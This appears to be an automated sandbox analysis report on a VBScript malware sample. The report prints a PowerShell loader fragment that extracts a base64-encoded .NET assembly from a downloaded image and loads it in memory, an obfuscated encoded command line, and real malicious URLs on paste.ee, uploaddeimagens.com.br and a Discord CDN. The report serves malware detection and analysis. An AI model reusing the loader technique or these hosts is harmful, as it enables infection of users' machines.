DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
          Timestamp:05/23/24-18:26:42.231791
          SID:2018856
          Source Port:443
          Destination Port:49721
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/23/24-18:26:42.231791
          SID:2047750
          Source Port:443
          Destination Port:49721
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
          Source: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029Avira URL Cloud: Label: malware
          Source: windows.vbsReversingLabs: Detection: 28%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.1% probability
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.12:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.12:49722 version: TLS 1.2
          Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000008.00000002.2701828288.000002CA13776000.00000004.00000020.00020000.00000000.sdmp

          Spreading

          barindex
          Source: Yara matchFile source: windows.vbs, type: SAMPLE
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

          Software Vulnerabilities

          barindex
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 188.114.96.3:443 -> 192.168.2.12:49721
          Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 188.114.96.3:443 -> 192.168.2.12:49721
          Source: unknownDNS query: name: paste.ee
          Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
          Source: global trafficHTTP traffic detected: GET /attachments/1235627023511191643/1235641626869764136/windows.txt?ex=66351c70&is=6633caf0&hm=afaee1daa8e0485d79f5ee7e2461094a5fe88bfe3663435697c99103a2dc00f0& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
          Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /d/umxfl HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /d/umxfl HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
          Source: global trafficHTTP traffic detected: GET /attachments/1235627023511191643/1235641626869764136/windows.txt?ex=66351c70&is=6633caf0&hm=afaee1daa8e0485d79f5ee7e2461094a5fe88bfe3663435697c99103a2dc00f0& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: paste.ee
          Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
          Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 16:26:49 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=qPUi_QfVuHGtQkNJEvr.HuVJjh4FDDQ6kclPajtGcqU-1716481609-1.0.1.1-.8N4lP.U.c.R0jq3zYmwBncVCvq0f9DD10GpKZSGAI.KyyrW1Ua7aSmhzFrqCNerzxhaxiOHqnULsTMIQSjGew; path=/; expires=Thu, 23-May-24 16:56:49 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eDhkyx05aGgkNWBn5gMHkSwoNh08OwTquqPJhgs%2Fx1TfzOCN58F%2Bj9wCpFIdxIYbl1XvHd1VIAaK%2FXXgrCt01f%2BRPKapISKG%2BR6af3gyMyB387UcIpt1IGns%2FUTpWUAxZ6p7eg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=9NCGozscaYYydFkivz9.21W41v9nWaQ2XngpvlaA9e4-1716481609883-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 888668edabd30f91-EWRalt-svc: h3=":443"; ma=86400
          Source: wscript.exe, 00000000.00000003.2325461625.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.00000125100F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2514780950.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2516088916.000001250FD80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325898663.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326061758.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522409365.000001250E0E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520382934.000001250FD72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325381099.000001250FD80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520106323.000001250E0E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325544492.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326031502.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520623399.000001250FDA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522622351.000001250FD70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2516046227.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519449118.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2514887391.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325932418.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522645221.000001250FD75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325356738.000001250E05A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519449118.000001250FD84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx
          Source: wscript.exe, 00000000.00000003.2325512254.000001250FD74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326031502.000001250FD7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx_Tex
          Source: wscript.exe, 00000000.00000003.2325461625.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2514780950.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325898663.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326061758.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325544492.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326031502.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520623399.000001250FDA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2516046227.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519449118.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2514887391.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325932418.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326000668.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2325969324.000001250FD9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxd
          Source: wscript.exe, 00000000.00000002.2523019692.0000012510B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
          Source: powershell.exe, 00000006.00000002.3047439942.000001D4C3D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft~#
          Source: powershell.exe, 00000008.00000002.2886427774.000002CA256FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000008.00000002.2702281796.000002CA158B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000006.00000002.3007331648.000001D4ABBAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2702281796.000002CA15691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000008.00000002.2702281796.000002CA1BB7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uploaddeimagens.com.br
          Source: powershell.exe, 00000008.00000002.2702281796.000002CA158B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000006.00000002.3007331648.000001D4ABB39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
          Source: powershell.exe, 00000006.00000002.3007331648.000001D4ABB96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2702281796.000002CA15691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
          Source: wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
          Source: wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
          Source: wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
          Source: powershell.exe, 00000008.00000002.2886427774.000002CA256FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000008.00000002.2886427774.000002CA256FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000008.00000002.2886427774.000002CA256FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
          Source: powershell.exe, 00000008.00000002.2702281796.000002CA158B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000006.00000002.3043269238.000001D4C3C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.coT
          Source: wscript.exe, 00000000.00000003.2519666628.0000012510114000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: powershell.exe, 00000008.00000002.2886427774.000002CA256FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: wscript.exe, 00000000.00000002.2522818795.00000125100FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.00000125100FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/&
          Source: wscript.exe, 00000000.00000003.2520062183.00000125100D4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/umxfl
          Source: wscript.exe, 00000000.00000003.2519666628.0000012510114000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/umxfl&
          Source: wscript.exe, 00000000.00000003.2519666628.0000012510114000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/umxflJ
          Source: wscript.exe, 00000000.00000003.2520313262.000001250E086000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522362736.000001250E087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/umxflerD
          Source: wscript.exe, 00000000.00000002.2522818795.00000125100FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.00000125100FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/l
          Source: wscript.exe, 00000000.00000003.2325512254.000001250FD74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2326031502.000001250FD7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastsubposto.subpostosubposto/d/um
          Source: wscript.exe, 00000000.00000003.2325969324.000001250FD9E000.00000004.00000020.00020000.00000000.sdmp, windows.vbsString found in binary or memory: https://pastsubposto.subpostosubposto/d/umxfl
          Source: wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
          Source: wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
          Source: powershell.exe, 00000008.00000002.2702281796.000002CA158B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
          Source: powershell.exe, 00000008.00000002.2701828288.000002CA13776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
          Source: wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2519666628.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2522818795.0000012510143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
          Source: wscript.exe, 00000000.00000002.2522195506.000001250E000000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2520794814.0000012510205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.12:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.12:49722 version: TLS 1.2

          System Summary

          barindex
          Source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9834
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9834Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebg